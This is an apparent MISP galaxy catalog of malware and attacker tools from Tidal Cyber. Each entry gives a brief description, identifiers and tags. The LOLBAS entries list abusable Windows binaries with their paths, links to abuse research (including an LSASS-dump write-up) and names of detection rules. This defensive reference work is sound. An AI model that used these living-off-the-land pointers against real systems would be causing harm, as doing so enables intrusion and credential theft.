Tidal Software
Tidal Software Cluster
Authors
Authors and/or Contributors |
---|
Tidal Cyber |
3PARA RAT
3PARA RAT is a remote access tool (RAT) programmed in C++ that has been used by Putter Panda. [CrowdStrike Putter Panda]
Internal MISP references
UUID 71d76208-c465-4447-8d6e-c54f142b65a4
which can be used as unique global reference for 3PARA RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0066 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
4H RAT
4H RAT is malware that has been used by Putter Panda since at least 2007. [CrowdStrike Putter Panda]
Internal MISP references
UUID a15142a3-4797-4fef-8ec6-065e3322a69b
which can be used as unique global reference for 4H RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0065 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
7-Zip
7-Zip is a tool used to compress files into an archive.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 4665e52b-3c5c-4a7f-9432-c89ef26f2c93
which can be used as unique global reference for 7-Zip
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5023 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'c45ce044-b5b9-426a-866c-130e9f2a4427', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
8Base Ransomware
The 8Base ransomware operation began claiming significant numbers of victims on its data leak site in June 2023, including organizations in a range of sectors. Researchers have observed considerable similarities between aspects of 8Base's operations and those of other ransomware groups, leading them to suspect that 8Base may be an evolution or offshoot of existing operations. The language in 8Base's ransom notes is similar to the language seen in RansomHouse's notes, and there is strong overlap between the code of Phobos ransomware and 8Base.[VMWare 8Base June 28 2023][Acronis 8Base July 17 2023]
Internal MISP references
UUID 88a5435f-5586-4cb4-a9c0-1961ee060a67
which can be used as unique global reference for 8Base Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5299 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AADInternals
AADInternals is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.[AADInternals Github][AADInternals Documentation]
Internal MISP references
UUID 3d33fbf5-c21e-4587-ba31-9aeec3cc10c0
which can be used as unique global reference for AADInternals
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Azure AD', 'Office 365', 'Windows'] |
software_attack_id | S0677 |
source | MITRE |
tags | ['c9c73000-30a5-4a16-8c8b-79169f9c24aa', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
ABK
ABK is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID 394cadd0-bc4d-4181-ac53-858e84b8e3de
which can be used as unique global reference for ABK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0469 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AccCheckConsole
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Verifies UI accessibility requirements
Author: bohops
Paths: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe * C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe * C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm\AccChecker\AccCheckConsole.exe * C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm64\AccChecker\AccCheckConsole.exe
Resources: * https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 * https://twitter.com/bohops/status/1477717351017680899
Detection: * Sigma: proc_creation_win_lolbin_susp_acccheckconsole.yml * IOC: Sysmon Event ID 1 - Process Creation * Analysis: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340[AccCheckConsole.exe - LOLBAS Project]
Internal MISP references
UUID cce705c7-49f8-4b54-b854-fd4b3a32e6ff
which can be used as unique global reference for AccCheckConsole
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5203 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
AccountRestore
AccountRestore is a .NET executable that is used to brute force Active Directory accounts. The tool searches for a list of specific users and attempts to brute force the accounts based on a password file provided by the user.[Security Joes Sockbot March 09 2022]
Internal MISP references
UUID 6bc29df2-195e-410c-ad08-f3661575492f
which can be used as unique global reference for AccountRestore
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5059 |
source | Tidal Cyber |
tags | ['dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AcidRain
AcidRain is an ELF binary targeting modems and routers using MIPS architecture.[AcidRain JAGS 2022] AcidRain is associated with the ViaSat KA-SAT communication outage that took place during the initial phases of the 2022 full-scale invasion of Ukraine. Analysis indicates overlap with another network device-targeting malware, VPNFilter, associated with Sandworm Team.[AcidRain JAGS 2022] US and European government sources linked AcidRain to Russian government entities, while Ukrainian government sources linked AcidRain specifically to Sandworm Team.[AcidRain State Department 2022][Vincens AcidPour 2024]
Internal MISP references
UUID cf465790-3d6d-5767-bb8c-63a429f95d83
which can be used as unique global reference for AcidRain
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network', 'Linux'] |
software_attack_id | S1125 |
source | MITRE |
tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Action RAT
Action RAT is a remote access tool written in Delphi that has been used by SideCopy since at least December 2021 against Indian and Afghani government personnel.[MalwareBytes SideCopy Dec 2021]
Internal MISP references
UUID 202781a3-d481-4984-9e5a-31caafc20135
which can be used as unique global reference for Action RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1028 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
adbupd
adbupd is a backdoor used by PLATINUM that is similar to Dipsind. [Microsoft PLATINUM April 2016]
Internal MISP references
UUID f52e759a-a725-4b50-84f2-12bef89d369e
which can be used as unique global reference for adbupd
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0202 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AddinUtil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: .NET Tool used for updating cache files for Microsoft Office Add-Ins.
Author: Michael McKinley @MckinleyMike
Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe
Resources: * https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
Detection: * Sigma: proc_creation_win_addinutil_suspicious_cmdline.yml * Sigma: proc_creation_win_addinutil_uncommon_child_process.yml * Sigma: proc_creation_win_addinutil_uncommon_cmdline.yml * Sigma: proc_creation_win_addinutil_uncommon_dir_exec.yml[AddinUtil.exe - LOLBAS Project]
Internal MISP references
UUID 253f97c3-ba35-4064-8ec0-892872432214
which can be used as unique global reference for AddinUtil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5082 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
AdFind
AdFind is a free command-line query tool that can be used for gathering information from Active Directory.[Red Canary Hospital Thwarted Ryuk October 2020][FireEye FIN6 Apr 2019][FireEye Ryuk and Trickbot January 2019]
Internal MISP references
UUID 70559096-2a6b-4388-97e6-c2b16f3be78e
which can be used as unique global reference for AdFind
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0552 |
source | MITRE |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '3a633b73-9c2c-4293-8577-fb97be0cda37', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
adplus
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Paths: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
Resources: * https://mrd0x.com/adplus-debugging-tool-lsass-dump/ * https://twitter.com/nas_bench/status/1534916659676422152 * https://twitter.com/nas_bench/status/1534915321856917506
Detection: * Sigma: proc_creation_win_lolbin_adplus.yml * IOC: As a Windows SDK binary, execution on a system may be suspicious[adplus.exe - LOLBAS Project]
Internal MISP references
UUID 3f229fe8-4d03-48ba-97b5-d7132510e090
which can be used as unique global reference for adplus
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5204 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ADRecon
ADRecon is an open-source tool that can be used to gather a "holistic" view of a target Active Directory environment.[GitHub ADRecon]
Internal MISP references
UUID c227bea1-9996-49d6-97ca-10a2fc156747
which can be used as unique global reference for ADRecon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5270 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Advanced IP Scanner
Advanced IP Scanner is a tool used to perform network scans and show network devices.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID ff0af6fd-e4a1-47c9-b4a1-7ce5074e089e
which can be used as unique global reference for Advanced IP Scanner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5024 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Advanced Port Scanner
Advanced Port Scanner is a tool used to perform network scans.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID f93b54cf-a17c-4739-a7af-4106055f868d
which can be used as unique global reference for Advanced Port Scanner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5006 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
AdvancedRun
AdvancedRun is a tool used to enable software execution under user-defined settings.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 7ef15943-8061-4941-b14e-9634c0b95d28
which can be used as unique global reference for AdvancedRun
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5025 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '7de7d799-f836-4555-97a4-0db776eb6932', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Advpack
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Utility for installing software and drivers with rundll32.exe
Author: LOLBAS Team
Paths: * c:\windows\system32\advpack.dll * c:\windows\syswow64\advpack.dll
Resources: * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ * https://twitter.com/ItsReallyNick/status/967859147977850880 * https://twitter.com/bohops/status/974497123101179904 * https://twitter.com/moriarty_meng/status/977848311603380224
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml * Splunk: detect_rundll32_application_control_bypass___advpack.yml[Advpack.dll - LOLBAS Project]
Internal MISP references
UUID 6c82fc65-864a-4a8c-80ed-80a69920c44f
which can be used as unique global reference for Advpack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5187 |
source | Tidal Cyber |
tags | ['7a457caf-c3b6-4a48-84cf-c1f50a2eda27', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ADVSTORESHELL
ADVSTORESHELL is a spying backdoor that has been used by APT28 from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. [Kaspersky Sofacy] [ESET Sednit Part 2]
Internal MISP references
UUID ef7f4f5f-6f30-4059-87d1-cd8375bf1bee
which can be used as unique global reference for ADVSTORESHELL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0045 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635', '16b47583-1c54-431f-9f09-759df7b5ddb7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Agent.btz
Agent.btz is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. [Securelist Agent.btz]
Internal MISP references
UUID f27c9a91-c618-40c6-837d-089ba4d80f45
which can be used as unique global reference for Agent.btz
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0092 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
AgentExecutor
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Intune Management Extension included on Intune Managed Devices
Author: Eleftherios Panos
Paths: * C:\Program Files (x86)\Microsoft Intune Management Extension
Resources:
Detection: * Sigma: proc_creation_win_lolbin_agentexecutor.yml * Sigma: proc_creation_win_lolbin_agentexecutor_susp_usage.yml[AgentExecutor.exe - LOLBAS Project]
Internal MISP references
UUID 27fa7573-c1d3-4857-8a45-ef501c8ea32c
which can be used as unique global reference for AgentExecutor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5205 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Agent Tesla
Agent Tesla is a spyware Trojan written for the .NET framework that has been observed since at least 2014.[Fortinet Agent Tesla April 2018][Bitdefender Agent Tesla April 2020][Malwarebytes Agent Tesla April 2020]
Internal MISP references
UUID 304650b1-a0b5-460c-9210-23a5b53815a4
which can be used as unique global reference for Agent Tesla
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0331 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Akira
Akira ransomware, written in C++, is most prominently (but not exclusively) associated with the a ransomware-as-a-service entity Akira.[Kersten Akira 2023]
Internal MISP references
UUID 96ae0e1e-975a-5e11-adbe-c79ee17cee11
which can be used as unique global reference for Akira
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1129 |
source | MITRE |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '562e535e-19f5-4d6c-81ed-ce2aec544f09'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Akira Ransomware
A ransomware binary designed to encrypt victim files. More details about the TTPs typically observed during Akira ransomware attacks can be found in the associated Group object, "Akira Ransomware Actors".
Internal MISP references
UUID 59d598a9-e115-4d90-8fef-096015afa8d4
which can be used as unique global reference for Akira Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5280 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '562e535e-19f5-4d6c-81ed-ce2aec544f09'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Amadey
Amadey is a Trojan bot that has been used since at least October 2018.[Korean FSI TA505 2020][BlackBerry Amadey 2020]
Internal MISP references
UUID f173ec20-ef40-436b-a859-fef017e1e767
which can be used as unique global reference for Amadey
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1025 |
source | MITRE |
tags | ['fa84181d-fd9a-4c7b-8e18-e47011993b5e', '263adb48-051c-4384-90cf-1d4c937c3f05', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Anchor
Anchor is one of a family of backdoor malware that has been used in conjunction with TrickBot on selected high profile targets since at least 2018.[Cyberreason Anchor December 2019][Medium Anchor DNS July 2020]
Internal MISP references
UUID 9521c535-1043-4b82-ba5d-e5eaeca500ee
which can be used as unique global reference for Anchor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0504 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ANDROMEDA
ANDROMEDA is commodity malware that was widespread in the early 2010's and continues to be observed in infections across a wide variety of industries. During the 2022 C0026 campaign, threat actors re-registered expired ANDROMEDA C2 domains to spread malware to select targets in Ukraine.[Mandiant Suspected Turla Campaign February 2023]
Internal MISP references
UUID 69aac793-9e6a-5167-bc62-823189ee2f7b
which can be used as unique global reference for ANDROMEDA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1074 |
source | MITRE |
type | ['malware'] |
Angry IP Scanner
Angry IP Scanner is a tool that adversaries are known to use to search for vulnerable RDP ports.[U.S. CISA Phobos February 29 2024]
Internal MISP references
UUID 8efa90ac-a894-467d-8633-16a44d270358
which can be used as unique global reference for Angry IP Scanner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S5274 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'cd1b5d44-226e-4405-8985-800492cf2865', 'e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
AnyDesk
AnyDesk is a tool used to enable remote connections to network devices.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 922447fd-f41e-4bcf-b479-88137c81099c
which can be used as unique global reference for AnyDesk
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5007 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'fb06d216-f535-45c1-993a-8c1b7aa2111c', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
AppInstaller
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Tool used for installation of AppX/MSIX applications on Windows 10
Author: Wade Hickey
Paths: * C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
Resources: * https://twitter.com/notwhickey/status/1333900137232523264
Detection: * Sigma: dns_query_win_lolbin_appinstaller.yml[AppInstaller.exe - LOLBAS Project]
Internal MISP references
UUID 9fa7c759-172f-4ae3-ac3d-0070c3c4c439
which can be used as unique global reference for AppInstaller
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5083 |
source | Tidal Cyber |
tags | ['837cf289-ad09-48ca-adf9-b46b07015666', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
AppleJeus
AppleJeus is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. AppleJeus has been used by Lazarus Group, targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. AppleJeus has been used to distribute the FALLCHILL RAT.[CISA AppleJeus Feb 2021]
Internal MISP references
UUID cdeb3110-07e5-4c3d-9eef-e6f2b760ef33
which can be used as unique global reference for AppleJeus
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Windows'] |
software_attack_id | S0584 |
source | MITRE |
tags | ['8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AppleSeed
AppleSeed is a backdoor that has been used by Kimsuky to target South Korean government, academic, and commercial targets since at least 2021.[Malwarebytes Kimsuky June 2021]
Internal MISP references
UUID 9df2e42e-b454-46ea-b50d-2f7d999f3d42
which can be used as unique global reference for AppleSeed
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Android', 'Windows'] |
software_attack_id | S0622 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Appvlp
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Application Virtualization Utility Included with Microsoft Office 2016
Author: Oddvar Moe
Paths: * C:\Program Files\Microsoft Office\root\client\appvlp.exe * C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Resources: * https://github.com/MoooKitty/Code-Execution * https://twitter.com/moo_hax/status/892388990686347264 * https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/ * https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
Detection: * Sigma: proc_creation_win_lolbin_appvlp.yml[Appvlp.exe - LOLBAS Project]
Internal MISP references
UUID 1328ae5d-7220-46bb-a7ee-0c5a31eeda7f
which can be used as unique global reference for Appvlp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5206 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
AresLoader
AresLoader is a loader malware distributed as malware-as-a-service. It has been observed being both dropped by and delivering SystemBC, a known ransomware precursor.[New loader on the bloc - AresLoader | Intel471]
Internal MISP references
UUID 5bf1ed41-8fe5-4c4b-8d80-a55980289e1f
which can be used as unique global reference for AresLoader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5286 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'a2e000da-8181-4327-bacd-32013dbd3654', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
